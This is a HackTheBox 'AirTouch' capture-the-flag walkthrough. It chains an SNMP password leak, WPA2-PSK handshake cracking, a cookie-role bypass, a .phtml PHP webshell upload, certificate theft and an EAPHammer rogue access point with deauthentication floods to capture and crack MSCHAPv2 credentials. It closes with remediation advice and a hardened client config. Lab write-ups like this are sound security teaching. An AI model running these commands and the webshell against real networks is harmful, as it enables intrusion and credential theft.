
HTB AirTouch: Medium Walkthrough – SNMP Leak to WPA2-Enterprise Rogue AP Attack

Introduction

AirTouch simulates a multi-segment corporate environment with three isolated VLANs: Consultant, Tablets (WPA2-PSK Wi-Fi), and Corporate (WPA2-Enterprise Wi-Fi). The attack chain uses SNMP enumeration, WPA2-PSK cracking, web exploitation, and a rogue access point attack to capture MSCHAPv2 credentials.

Attack Overview

SNMP leak → SSH access to Consultant machine
Network diagram discovery → understand segmentation
WPA2-PSK crack → access to Tablets VLAN
SSH tunnel + web exploitation + cookie manipulation → RCE on AP-PSK
Certificate theft → Rogue AP (EAP-Hammer) → MSCHAPv2 capture → crack
WPA2-Enterprise auth → SSH to MGT AP → root

SNMP Enumeration & Initial Foothold

UDP port 161 (SNMP) is open. The snmp-sysdescr script reveals a plaintext password in the system description (sysDescr.0, OID 1.3.6.1.2.1.1.1.0), a value any client that knows the read-only community string can query:

sudo nmap -sU -p 161 --script=snmp-sysdescr 10.129.42.209

Output:

PORT    STATE SERVICE
161/udp open  snmp
| snmp-sysdescr: "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"

SSH access as consultant:

ssh consultant@10.129.42.209
# Password: RxBlZhLmOkacNWScmZ6D

Network Diagram & Segmentation Analysis

The home directory contains two images. Serve them over HTTP on the target and pull them through an SSH local port forward (scp would also do this in a single step):

# On target: bind to loopback only, since the forward connects to localhost:8000
python3 -m http.server 8000 --bind 127.0.0.1
# On attack machine: -N -f keeps the forward open in the background
ssh -N -f -L 8000:localhost:8000 consultant@10.129.42.209
curl http://localhost:8000/diagram-net.png -o diagram-net.png

The network diagram reveals three VLANs:

VLAN        Subnet           Description
Consultant  172.20.1.0/24    Current position
Tablets     192.168.3.0/24   PSK Wi-Fi segment
Corporate   10.10.10.0/24    WPA2-Enterprise (target)

Two Wi-Fi SSIDs are present: AirTouch-Internet (PSK) and AirTouch-Office (WPA2-Enterprise).

Privilege Escalation on Consultant Machine

sudo -l
# (ALL) NOPASSWD: ALL
sudo -i

Root access reveals a pre-installed tool: /root/eaphammer (framework for WPA2-Enterprise Evil Twin attacks).

Wi-Fi Reconnaissance

Enable the wireless interface and scan:

ip link set wlan0 up
iwlist wlan0 scanning | grep -E 'ESSID|Channel|Signal'

Target SSID: AirTouch-Internet (Channel 6, PSK). Identify BSSID using airodump-ng:

airmon-ng start wlan1
airodump-ng wlan1mon

Target:

  • SSID: AirTouch-Internet
  • BSSID: F0:9F:C2:A3:F1:A7
  • Channel: 6

WPA2-PSK Handshake Capture & Crack

Start the capture first, then force a client to reconnect with a deauthentication attack. airodump-ng and aireplay-ng can share one monitor interface, so run them in two terminals:

# Terminal 1: capture on channel 6, written to capture_handshake-01.cap
airodump-ng --bssid F0:9F:C2:A3:F1:A7 -c 6 -w capture_handshake wlan1mon

# Terminal 2: deauth (0 = send frames until interrupted; a small count such as 5 is usually enough and less disruptive)
iwconfig wlan1mon channel 6
aireplay-ng --deauth 0 -a F0:9F:C2:A3:F1:A7 wlan1mon

airodump-ng shows "WPA handshake: F0:9F:C2:A3:F1:A7" in its header once the four-way handshake has been captured.

Crack offline:

aircrack-ng -w wordlist.txt capture_handshake-01.cap

Password: challenge

Joining the Tablets VLAN

wpa_passphrase "AirTouch-Internet" "challenge" > wpa.conf
wpa_supplicant -B -i wlan0 -c wpa.conf
dhclient wlan0

IP 192.168.3.21 assigned. The access point at 192.168.3.1 is now reachable.

Web Application Exploitation on 192.168.3.1

The web interface on 192.168.3.1 is only reachable from the Tablets VLAN, so tunnel to it through the Consultant machine, whose wlan0 is now on that segment:

sshpass -p "RxBlZhLmOkacNWScmZ6D" ssh -L 8080:192.168.3.1:80 consultant@10.129.42.209

Log in at http://localhost:8080 as manager with password 2wLFYNh4TSTgA5sNgT4 (the same pair is confirmed later from the application source once RCE is obtained). After login the server sets a cookie UserRole=user and trusts it on subsequent requests; changing it to UserRole=admin unlocks a file upload feature.

The upload endpoint blocks the .php and .html extensions but not .phtml, which Apache's default PHP module configuration also hands to the PHP interpreter:

<!-- webshell.phtml -->
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre><?php if(isset($_GET['cmd'])) { system($_GET['cmd'] . ' 2>&1'); } ?></pre>

Upload webshell.phtml and execute commands. Reading /var/www/html/login.php reveals an active credential: user:JunDRDZKHDnpkpDDvay.

SSH access to the PSK AP:

ssh user@192.168.3.1
# Password: JunDRDZKHDnpkpDDvay
sudo -l
# (ALL) NOPASSWD: ALL
sudo -i

User flag:

[redacted]

Certificate Theft

As root on the Tablets AP, a certificate sync script is present:

cat /root/send_certs.sh

Contents:

REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
sshpass -p "$REMOTE_PASSWORD" scp -r /root/certs-backup/ remote@10.10.10.1:~/certs-backup/

This provides:

  • Credentials for remote on the Corporate AP (10.10.10.1)
  • TLS certificates from /root/certs-backup/ (CA, server certificate with private key, passphrase amra)

Exfiltrate the certificates. The copy is made as root, so make it readable by user before pulling it from the Consultant machine:

# On the PSK AP (as root)
cp -r /root/certs-backup/ /tmp/
chown -R user /tmp/certs-backup/
# From the Consultant machine
scp -r user@192.168.3.1:/tmp/certs-backup/ .
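Before feeding the stolen material to EAPHammer it is worth confirming that the passphrase from send_certs.sh actually unlocks the key and that the key belongs to the server certificate; a mismatch only shows up later as a failed TLS handshake on the rogue AP. The following is an added example, not code from the walkthrough; it assumes the exfiltrated files sit in ./certs-backup/ under the names used in the EAPHammer import below (server.crt, server.key) and uses the passphrase amra named in the script.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): sanity-check stolen
# TLS material before importing it into EAPHammer.
# Assumed layout: ./certs-backup/server.crt and ./certs-backup/server.key,
# key passphrase "amra" as in send_certs.sh.

# key_matches_cert CERT KEY PASSPHRASE
#   returns 0 if the RSA modulus in the certificate equals the one in the key,
#   1 if they differ, 2 if either file cannot be read or the passphrase is wrong.
key_matches_cert() {
    cert_mod=$(openssl x509 -noout -modulus -in "$1") || return 2
    key_mod=$(openssl rsa -noout -modulus -in "$2" -passin "pass:$3") || return 2
    [ "$cert_mod" = "$key_mod" ]
}

# cert_summary CERT
#   prints subject, issuer and validity, i.e. what a validating client would
#   compare against its configured CA and server name.
cert_summary() {
    openssl x509 -noout -subject -issuer -dates -in "$1"
}

# Usage against the exfiltrated files
if key_matches_cert certs-backup/server.crt certs-backup/server.key amra; then
    cert_summary certs-backup/server.crt
else
    echo "server.key does not unlock with that passphrase or does not match server.crt" >&2
fi
```

If the moduli differ, the backup directory holds more than one key pair and the wrong one was picked; if openssl rsa fails, the passphrase in the script is stale and the cert wizard import will fail the same way.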

Rogue Access Point Against WPA2-Enterprise

Import the stolen certificates into EAPHammer:

/root/eaphammer/eaphammer --cert-wizard import \
  --server-cert server.crt \
  --ca-cert ca.crt \
  --private-key server.key \
  --private-key-passwd amra

Launch the rogue AP impersonating AirTouch-Office (EAPHammer's --creds flag turns on credential harvesting; add it if the challenge/response does not show up in the output):

/root/eaphammer/eaphammer -i wlan3 --auth wpa-eap --essid AirTouch-Office

Deauthenticate the client from both legitimate APs simultaneously (both on Channel 44):

Terminal 1:

airmon-ng start wlan1
iwconfig wlan1mon channel 44
aireplay-ng wlan1mon -0 0 -a AC:8B:A9:F3:A1:13 -c C8:8A:9A:6F:F9:D2

Terminal 2:

airmon-ng start wlan2
iwconfig wlan2mon channel 44
aireplay-ng wlan2mon -0 0 -a AC:8B:A9:AA:3F:D2 -c C8:8A:9A:6F:F9:D2

The client connects to the rogue AP. EAPHammer captures the MSCHAPv2 challenge/response:

username:  r4ulcl
challenge: d0:f9:b2:e1:31:5f:05:d8
response:  a3:c7:0e:c5:a5:8c:78:34:4d:f8:7a:a3:0d:f6:e5:7b:da:40:27:5e:93:a9:17:3b

Hashcat NETNTLM format:

r4ulcl::::a3c70ec5a58c78344df87aa30df6e57bda40275e93a9173b:d0f9b2e1315f05d8
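EAPHammer prints that line itself, but when the capture comes from hostapd-wpe logs or has to be rebuilt by hand it helps to know the field layout: user::domain:lmresp:ntresp:challenge, with domain and LM response empty for MSCHAPv2, the 24-byte response as 48 hex characters and the 8-byte challenge as 16. The function below is an added example, not part of the walkthrough or of EAPHammer; it rebuilds the hashcat -m 5500 line from the three captured values and rejects malformed input before anything is handed to the cracker.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): rebuild the hashcat
# -m 5500 (NetNTLMv1 / MSCHAPv2) line from an EAPHammer capture.
# Field layout: user::domain:lmresp:ntresp:challenge. MSCHAPv2 has no domain
# and no LM response, so those two fields are left empty.

# strip_hex HEX -> same bytes without ':' separators, lowercased
strip_hex() {
    printf '%s' "$1" | tr -d ':' | tr 'A-F' 'a-f'
}

# mschapv2_to_5500 USER CHALLENGE RESPONSE
#   prints the hashcat line, or returns 1 if the lengths or characters are wrong
mschapv2_to_5500() {
    user=$1
    chal=$(strip_hex "$2")
    resp=$(strip_hex "$3")
    # 8-byte challenge -> 16 hex chars; 24-byte response -> 48 hex chars
    [ "${#chal}" -eq 16 ] || { echo "bad challenge length" >&2; return 1; }
    [ "${#resp}" -eq 48 ] || { echo "bad response length" >&2; return 1; }
    case "$chal$resp" in
        *[!0-9a-f]*) echo "non-hex characters in input" >&2; return 1 ;;
    esac
    printf '%s::::%s:%s\n' "$user" "$resp" "$chal"
}

# The values EAPHammer printed in the capture above
mschapv2_to_5500 r4ulcl \
    d0:f9:b2:e1:31:5f:05:d8 \
    a3:c7:0e:c5:a5:8c:78:34:4d:f8:7a:a3:0d:f6:e5:7b:da:40:27:5e:93:a9:17:3b
# Then: hashcat -m 5500 hashes.txt wordlist.txt
```

Note the order of the last two fields: the response comes before the challenge, which is the opposite of the order EAPHammer prints them in.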

Cracked password: laboratory

Joining the Corporate VLAN & Root

Configure wpa_supplicant for WPA2-Enterprise. Note that this profile, like the victim client's, has no ca_cert or domain_match line, so it will accept any server certificate; that is exactly the weakness the rogue AP exploited:

network={
  ssid="AirTouch-Office"
  scan_ssid=1
  key_mgmt=WPA-EAP
  eap=PEAP
  identity="AirTouch\r4ulcl"
  password="laboratory"
  phase1="peapver=1"
  phase2="auth=MSCHAPV2"
}

Connect and obtain an IP:

wpa_supplicant -Dnl80211 -iwlan3 -c client.conf
dhclient -v wlan3
# Bound to 10.10.10.10
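The attack succeeded because the corporate client accepted whatever certificate the rogue AP presented. The profile below is the added, hardened counterpart of client.conf above; it is not from the walkthrough. It pins the RADIUS CA and the server name so a PEAP tunnel is only built to the legitimate authenticator. The CA bundle path and the server name are assumptions chosen for illustration and must be replaced with the real corporate values.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): generate a PEAP/MSCHAPv2
# wpa_supplicant profile that validates the RADIUS server certificate.
# The two values below are assumptions for illustration only.
CA_BUNDLE=/etc/ssl/certs/airtouch-radius-ca.pem   # assumed: CA that signed the RADIUS cert
RADIUS_NAME=radius.airtouch.local                 # assumed: CN/SAN of the legitimate server

# hardened_peap_conf SSID IDENTITY PASSWORD -> prints a wpa_supplicant network block
hardened_peap_conf() {
cat <<EOF
network={
  ssid="$1"
  scan_ssid=1
  key_mgmt=WPA-EAP
  eap=PEAP
  identity="$2"
  anonymous_identity="anonymous"
  password="$3"
  phase2="auth=MSCHAPV2"
  # Trust only this CA and only a certificate whose name matches the RADIUS server.
  ca_cert="$CA_BUNDLE"
  domain_match="$RADIUS_NAME"
}
EOF
}

# conf_pins_server FILE -> 0 if FILE carries both ca_cert and domain_match, 1 otherwise
conf_pins_server() {
    grep -q '^[[:space:]]*ca_cert=' "$1" && grep -q '^[[:space:]]*domain_match=' "$1"
}

# Usage: write the profile and confirm it pins the server before handing it to wpa_supplicant
out=${TMPDIR:-/tmp}/client-hardened.conf
hardened_peap_conf AirTouch-Office 'AirTouch\r4ulcl' laboratory > "$out"
conf_pins_server "$out" && echo "$out pins the RADIUS server certificate"
```

With this profile the client refuses the rogue AP at the TLS stage, so no MSCHAPv2 exchange ever takes place; anonymous_identity additionally keeps the real username out of the unencrypted outer EAP identity. The conf_pins_server check is a cheap audit you can run over every supplicant profile in a fleet.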

SSH to the Corporate AP using credentials from the sync script:

ssh remote@10.10.10.1
# Password: xGgWEwqUpfoOVsLeROeG

Read /etc/hostapd/hostapd_wpe.eap_user to find an admin account:

"admin"  MSCHAPV2  "xMJpzXt4D9ouMuL3JJsMriF7KZozm7"

Switch to admin and escalate to root:

su admin
# Password: xMJpzXt4D9ouMuL3JJsMriF7KZozm7
sudo -i

Root flag:

[redacted]

Key Takeaways

Vulnerability, root cause and remediation for each finding:

SNMP information disclosure
  Root cause:  plaintext password stored in the sysDescr field
  Remediation: never store credentials in SNMP fields; restrict SNMP to management hosts, replace community strings with SNMPv3 authentication and privacy, and change any default community string

WPA2-PSK weak password
  Root cause:  the PSK "challenge" is in common wordlists
  Remediation: use a long, randomly generated PSK; move to 802.1X where possible

Broken access control via cookie manipulation
  Root cause:  the UserRole cookie is trusted client-side
  Remediation: enforce role checks on the server against the authenticated session; never derive privileges from client-supplied values

File upload restriction bypass
  Root cause:  blocklist covering only .php and .html
  Remediation: allowlist safe extensions, validate file contents, and store uploads outside the web root or without execute permissions

Credentials in scripts and config files
  Root cause:  plaintext SSH and EAP passwords in send_certs.sh and hostapd_wpe.eap_user
  Remediation: keep secrets in a secret store or use key-based SSH; restrict file permissions

WPA2-Enterprise rogue AP attack
  Root cause:  the client does not validate the RADIUS server certificate, so it builds the PEAP tunnel to the attacker
  Remediation: enforce server certificate validation (pinned CA plus server name match) on every client; prefer EAP-TLS over PEAP/MSCHAPv2

MSCHAPv2 hash crackable offline
  Root cause:  the challenge/response captured by the rogue AP can be attacked offline with a wordlist, and the NT hash itself can be recovered by exhausting the DES key space regardless of password strength
  Remediation: migrate to EAP-TLS or another certificate-based method; where PEAP/MSCHAPv2 must remain, strict server validation keeps the inner exchange from ever reaching a rogue AP

Resources

  • Nmap — SNMP enumeration
  • aircrack-ng — Handshake capture and WPA2-PSK cracking
  • EAPHammer — Rogue AP framework for WPA2-Enterprise
  • hashcat — MSCHAPv2 hash cracking (mode 5500)
  • wpa_supplicant — WPA2-Enterprise client configuration
  • sshpass — Non-interactive SSH password authentication